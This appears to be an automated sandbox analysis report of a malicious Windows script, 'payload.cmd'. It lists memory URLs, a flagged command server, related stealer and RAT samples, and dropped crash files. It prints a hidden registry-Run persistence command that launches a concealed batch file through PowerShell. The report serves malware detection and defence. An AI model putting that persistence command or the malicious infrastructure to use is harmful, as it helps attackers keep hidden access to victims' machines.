Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000009.00000002.1939727750.000002753CE8B000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2262954013.000001909CE2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2262954013.000001909CC89000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702	lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000027.00000002.2076913027.000001908CE4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2289327264.00000190A511C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/09/policy	lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/wsdl/erties	lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000027.00000002.2076913027.000001908CE4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2289327264.00000190A511C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://go.micro	powershell.exe, 00000027.00000002.2076913027.000001908E0C4000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.microsoft.co	powershell.exe, 0000001D.00000002.2617048225.0000025785F60000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://contoso.com/License	powershell.exe, 00000027.00000002.2262954013.000001909CC89000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000027.00000002.2262954013.000001909CC89000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://osoft.co_2010-06X	dwm.exe, 0000002D.00000002.2645406461.00000262ED790000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 0000002D.00000000.2095647683.00000262ED790000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://aka.ms/pscore6	powershell.exe, 00000009.00000002.1690548235.000002752CE01000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2621362180.00000257863A1000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust	lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000027.00000002.2076913027.000001908CE4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2289327264.00000190A511C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://go.mic	powershell.exe, 0000001D.00000002.2596558815.00000257845F6000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/07/securitypolicy	lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2575652739.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078686359.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/wsdl/soap12/	lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://aka.ms/pscore6xGh	powershell.exe, 00000009.00000002.1690548235.000002752CE01000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2621362180.00000257863A1000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/wsdl/	lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 00000027.00000002.2262954013.000001909CC89000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000009.00000002.1939727750.000002753CE8B000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2262954013.000001909CC89000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/wsdl/soap12/P	lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://Passport.NET/tb	Microsoft-Windows-LiveId%4Operational.evtx.53.dr	false		unknown
https://aka.ms/pscore68	powershell.exe, 00000009.00000002.1690548235.000002752CE01000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2621362180.00000257863A1000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2076913027.000001908CC21000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/ws-sx/ws-trust/200512	lsass.exe, 0000002B.00000002.2575652739.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078686359.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000009.00000002.1690548235.000002752CE01000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2621362180.00000257863A1000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2076913027.000001908CC21000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://go.micom/fwlink/?LinkI	powershell.exe, 0000001D.00000002.2596558815.00000257845F6000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
154.216.20.132	azure-winsecure.com	Seychelles		135357	SKHT-ASShenzhenKatherineHengTechnologyInformationCo	true
195.201.57.90	ipwho.is	Germany		24940	HETZNER-ASDE	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1524983
Start date and time:	2024-10-03 14:52:55 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	44
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	17
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	payload.cmd
Detection:	MAL
Classification:	mal100.spyw.evad.winCMD@54/88@2/2
EGA Information:	Successful, ratio: 92.3%
HCA Information:	Successful, ratio: 99% Number of executed functions: 71 Number of non-executed functions: 322
Cookbook Comments:	Found application associated with file extension: .cmd

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 40.126.31.73, 20.190.159.71, 20.190.159.75, 20.190.159.2, 20.190.159.0, 40.126.31.67, 20.190.159.68, 20.190.159.4, 52.168.117.173, 104.208.16.94, 20.190.159.73, 20.190.159.23, 40.126.31.71, 40.126.31.69
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, prdv4a.aadg.msidentity.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, time.windows.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net, onedsblobprdcus16.centralus.cloudapp.azure.com
Execution Graph export aborted for target powershell.exe, PID 6324 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtFsControlFile calls found.
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: payload.cmd

Simulations

Behavior and APIs

Time	Type	Description
08:53:54	API Interceptor	4x Sleep call for process: WMIC.exe modified
08:53:57	API Interceptor	39315x Sleep call for process: powershell.exe modified
10:22:53	API Interceptor	2x Sleep call for process: WerFault.exe modified
10:24:17	API Interceptor	154x Sleep call for process: lsass.exe modified
10:24:17	API Interceptor	172x Sleep call for process: winlogon.exe modified
10:24:18	API Interceptor	145x Sleep call for process: dwm.exe modified
10:24:18	API Interceptor	1065x Sleep call for process: svchost.exe modified
10:24:28	API Interceptor	14x Sleep call for process: cmd.exe modified
10:24:28	API Interceptor	15x Sleep call for process: conhost.exe modified
16:23:56	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden
16:24:04	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
154.216.20.132	SC.cmd	Get hash	malicious	Unknown	Browse
	1.cmd	Get hash	malicious	Unknown	Browse
	2.cmd	Get hash	malicious	Unknown	Browse
	download_2.exe	Get hash	malicious	Quasar	Browse
195.201.57.90	SPt4FUjZMt.exe	Get hash	malicious	AsyncRAT, Luca Stealer, MicroClip, PythonCryptoHijacker, RedLine	Browse	/?output=json
	765iYbgWn9.exe	Get hash	malicious	Luca Stealer	Browse	/?output=json
	765iYbgWn9.exe	Get hash	malicious	Luca Stealer	Browse	/?output=json
	WfKynArKjH.exe	Get hash	malicious	AsyncRAT, Luca Stealer, MicroClip, RedLine	Browse	/?output=json
	ubes6SC7Vd.exe	Get hash	malicious	Unknown	Browse	ipwhois.app/xml/
	cOQD62FceM.exe	Get hash	malicious	Luca Stealer, Rusty Stealer	Browse	/?output=json
	Clipper.exe	Get hash	malicious	Unknown	Browse	/?output=json
	cOQD62FceM.exe	Get hash	malicious	Luca Stealer	Browse	/?output=json
	Cryptor.exe	Get hash	malicious	Luca Stealer	Browse	/?output=json
	Cryptor.exe	Get hash	malicious	Luca Stealer, Rusty Stealer	Browse	/?output=json

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
azure-winsecure.com	SC.cmd	Get hash	malicious	Unknown	Browse	154.216.20.132
	1.cmd	Get hash	malicious	Unknown	Browse	154.216.20.132
	2.cmd	Get hash	malicious	Unknown	Browse	154.216.20.132
	download_2.exe	Get hash	malicious	Quasar	Browse	154.216.20.132
ipwho.is	SC.cmd	Get hash	malicious	Unknown	Browse	195.201.57.90
	1.cmd	Get hash	malicious	Unknown	Browse	108.181.98.179
	2.cmd	Get hash	malicious	Unknown	Browse	195.201.57.90
	download_2.exe	Get hash	malicious	Quasar	Browse	147.135.36.89
	MZs41xJfcH.exe	Get hash	malicious	PureLog Stealer, Quasar, zgRAT	Browse	195.201.57.90
	N5mRSBWm8P.exe	Get hash	malicious	Quasar	Browse	195.201.57.90
	Pedido09669281099195.com.exe	Get hash	malicious	DarkTortilla, Quasar	Browse	195.201.57.90
	mtgjyX9gHF.exe	Get hash	malicious	Quasar	Browse	108.181.98.179
	SecuriteInfo.com.BackDoor.QuasarNET.3.14065.23993.exe	Get hash	malicious	Quasar	Browse	195.201.57.90
	http://ufvskbzrquea.pages.dev/	Get hash	malicious	TechSupportScam	Browse	195.201.57.90
bg.microsoft.map.fastly.net	SC.cmd	Get hash	malicious	Unknown	Browse	199.232.210.172
	Ton618.exe	Get hash	malicious	Quasar	Browse	199.232.214.172
	Ton618 (2).exe	Get hash	malicious	Quasar	Browse	199.232.210.172
	https://drmerp.com/bWFpbEBrc2xhdy5jby51aw==&xBvSo7gjDRPy&hmr&x-ad-vt-unk&OC305935	Get hash	malicious	HTMLPhisher	Browse	199.232.214.172
	2.cmd	Get hash	malicious	Unknown	Browse	199.232.210.172
	http://arcor.cfd	Get hash	malicious	HTMLPhisher	Browse	199.232.210.172
	veEGy9FijY.exe	Get hash	malicious	SmokeLoader	Browse	199.232.210.172
	http://investmentmemo.xyz	Get hash	malicious	HtmlDropper	Browse	199.232.210.172
	https://www.google.com.pe/url?q=Y7AzKRq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kI3xqbL8&sa=t&url=amp%2F%E2%80%8Bfc%C2%ADcid%E3%80%82io/www/%E2%80%8Brosan%C2%ADasidon%C2%ADiotri%C2%ADcologista%E2%80%8B.co%C2%ADm.%C2%ADbr/lo/lo//nJ5u8/Y21jX2FsbF9lbXBsb3llZXNfY29zdGFfcmljYUBjYXRhbGluYS5jb20=$	Get hash	malicious	HtmlDropper	Browse	199.232.214.172
	mnFHs2DuKg.exe	Get hash	malicious	Unknown	Browse	199.232.210.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HETZNER-ASDE	SC.cmd	Get hash	malicious	Unknown	Browse	195.201.57.90
	2.cmd	Get hash	malicious	Unknown	Browse	195.201.57.90
	file.exe	Get hash	malicious	Vidar	Browse	49.12.197.9
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	49.12.197.9
	gp4uQBDTP8.exe	Get hash	malicious	Xehook Stealer	Browse	116.203.0.21
	dNNMgwxY4f.exe	Get hash	malicious	Xehook Stealer	Browse	116.203.0.21
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	49.12.197.9
	oRdgOQMxjr.exe	Get hash	malicious	RedLine	Browse	178.63.51.126
	https://www.diamondsbyeden.com/	Get hash	malicious	Unknown	Browse	136.243.216.232
	file.exe	Get hash	malicious	Vidar	Browse	49.12.197.9
SKHT-ASShenzhenKatherineHengTechnologyInformationCo	SC.cmd	Get hash	malicious	Unknown	Browse	154.216.20.132
	RICHIESTA_OFFERTA_RDO2400423.docx.doc	Get hash	malicious	GuLoader	Browse	154.216.20.22
	1.cmd	Get hash	malicious	Unknown	Browse	154.216.20.132
	2.cmd	Get hash	malicious	Unknown	Browse	154.216.20.132
	download_2.exe	Get hash	malicious	Quasar	Browse	154.216.20.132
	New order02102024.doc	Get hash	malicious	Nanocore	Browse	154.216.20.22
	KBGC_1200O000000_98756.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	154.216.20.22
	https://akbb.kampanyakrediiislemleri.com/	Get hash	malicious	Unknown	Browse	154.216.20.140
	mpsl.elf	Get hash	malicious	Mirai	Browse	156.254.70.160
	ppc.elf	Get hash	malicious	Mirai	Browse	156.254.70.191

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	SC.cmd	Get hash	malicious	Unknown	Browse	195.201.57.90
	file.exe	Get hash	malicious	Credential Flusher	Browse	195.201.57.90
	QUOTATIONS#08670.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	195.201.57.90
	1.cmd	Get hash	malicious	Unknown	Browse	195.201.57.90
	2.cmd	Get hash	malicious	Unknown	Browse	195.201.57.90
	download_2.exe	Get hash	malicious	Quasar	Browse	195.201.57.90
	PVUfopbGfc.exe	Get hash	malicious	LummaC	Browse	195.201.57.90
	gp4uQBDTP8.exe	Get hash	malicious	Xehook Stealer	Browse	195.201.57.90
	dNNMgwxY4f.exe	Get hash	malicious	Xehook Stealer	Browse	195.201.57.90
	tYeFOUhVLd.exe	Get hash	malicious	RedLine	Browse	195.201.57.90

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_powershell.exe_dc34baa62d94b1453e37c8fdf4c57a0ef7376b6_e3b0f337_42f6c3a8-d842-4e1b-810a-fd49d4776785\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.509705277121146
Encrypted:	false
SSDEEP:	192:tBamG5y9d0eLDkja1TyDWRhl4Glg6zuiF9Z24lO8n:btG5ykeLDkjOTJj4kg6zuiF9Y4lO8n
MD5:	D21AD234D177ABFA8F6B41E97799A15E
SHA1:	67619D7CC4064F6B5CD09E28FF320BD0C796153F
SHA-256:	AFA7A737C9D6CB7797D7AFB0E81F0D69289AB02FAA968A9162AABE16290A768A
SHA-512:	69A71FEBDF9E2798F874AAD99550161F02E0E0B8DFF3BC4B9F9534E99BD80E0D95400C9DE562503F17EF739985A28E6F635FEA4905677A434B32960E11106F80
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.4.3.9.0.1.1.6.3.2.7.8.8.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.4.3.9.0.1.3.2.5.7.8.1.2.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.2.f.6.c.3.a.8.-.d.8.4.2.-.4.e.1.b.-.8.1.0.a.-.f.d.4.9.d.4.7.7.6.7.8.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.2.6.b.c.0.5.b.-.5.b.6.f.-.4.0.5.0.-.b.b.7.9.-.c.4.9.8.e.2.0.9.0.d.d.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.p.o.w.e.r.s.h.e.l.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.8.0.-.0.0.0.1.-.0.0.1.4.-.d.8.0.4.-.3.2.c.f.9.f.1.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_powershell.exe_dc34baa62d94b1453e37c8fdf4c57a0ef7376b6_e3b0f337_a2c71c6d-8906-440a-a6d6-1113292059f7\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.5097629431757393
Encrypted:	false
SSDEEP:	192:zp2mGwy9d0eLDkjaNTyUa8pBl5lg6zuiFqZ24lO8n:95GwykeLDkjGTnpDLg6zuiFqY4lO8n
MD5:	1D0934945059F61EE61C311173090F96
SHA1:	4F1574DB5C3090344E8FDD3DBF9E30BFDA7DFAC1
SHA-256:	9F364BBD6583786239B9863DA3836EB86B2FB2EAF6A4D812B5A4CFEFD8C7C59B
SHA-512:	2166B7A53737E8B7F80D4AEDEFA44F2A1FF21873D0A22978299DF79994E36BC7DD07B9DD4FBD4CFCC29DC450CF5D07A57B20B7A8D10E26643EB166FF06BA4B77
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.4.3.3.6.4.4.1.7.0.8.6.2.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.4.3.3.6.4.5.0.3.0.2.3.7.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.2.c.7.1.c.6.d.-.8.9.0.6.-.4.4.0.a.-.a.6.d.6.-.1.1.1.3.2.9.2.0.5.9.f.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.f.4.4.7.3.8.7.-.2.1.5.5.-.4.8.d.1.-.b.f.0.a.-.0.d.9.f.1.7.3.0.3.0.1.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.p.o.w.e.r.s.h.e.l.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.1.0.-.0.0.0.1.-.0.0.1.4.-.2.f.f.b.-.c.9.4.e.9.3.1.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2F3A.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Oct 3 12:54:04 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	891641
Entropy (8bit):	3.530611607065083
Encrypted:	false
SSDEEP:	6144:LlV14seL197h4lSWPUmmvnZuAFgqCucSqnCcjJ3QX7Qi4:VY97yEWPUmmvnZ3FgbSqn7j9QX7Qi
MD5:	12BB952D99CBD7AC964E6D4E63C7E942
SHA1:	4E2DFA844C21810ACE843C50AE5A7492701428CE
SHA-256:	3171422903E0AAF7E045EFBB6F845092600B3C26ADA0FBE056C64676ABF0B45E
SHA-512:	70E16378D06A72ABF7C2DD6A7664C0638869B0B66DEAC9DBA957ED2996FC57F08D85630E2A5B475B7EDA96A2E42FA80634A560CE6B885413E871B2774893090B
Malicious:	false
Preview:	MDMP..a..... .........f.........................'...........5...2......t...D...........`.......8...........T............]...=..........Xh..........Dj..............................................................................eJ.......j......Lw......................T.............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER31CB.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8780
Entropy (8bit):	3.6957571508543463
Encrypted:	false
SSDEEP:	192:R6l7wVeJwp86Y7vf3gmfZaPKpWER89baNtf04+m:R6lXJm86YTvgmfQPtaXfB
MD5:	32972E2E22E9501E7C0ED9556C311B9C
SHA1:	6D6133784701EF2FCDA6AFA3B4C5A00A9250501F
SHA-256:	A7ADF895110A4FC3689A290465C5659541DBB7CEB5C199A36EB6D9E762DF80BF
SHA-512:	C084A024687DB656A3A02623AAB02A8C4C29D0D725065FB3D1BBD52834289FECD2FDC220D1999743D802F89CDD53C7C46C1F95D2232C0B80C93D6853644157FF
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.0.6.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER31FB.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4777
Entropy (8bit):	4.441955789917749
Encrypted:	false
SSDEEP:	48:cvIwWl8zseXgJg771I9fMWpW8VYUJYm8M4JQ9wSFxEyq8vlwoeytf6d:uIjfbI7El7VqJQGYEWuoeuf6d
MD5:	20D8A6E4BAF3B3C2266739CC995132F8
SHA1:	26CAE27DA0F405D23473617198A44F96268F7613
SHA-256:	94ADBEAD629757FC04AEE04ED92B49EAD414769CF822D332C632FD8CD238FE6B
SHA-512:	4ABCECD538CD261B3CDD5724B384A189372F40207BBA3C75500C03C9E0CDD7FA98C8D1BF2CBDC88A82B9F34A09E8A5F533A980D591ECF21A7CBB6112574AE8FD
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="527276" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6AE.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Oct 3 14:23:31 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	916504
Entropy (8bit):	3.470274057164105
Encrypted:	false
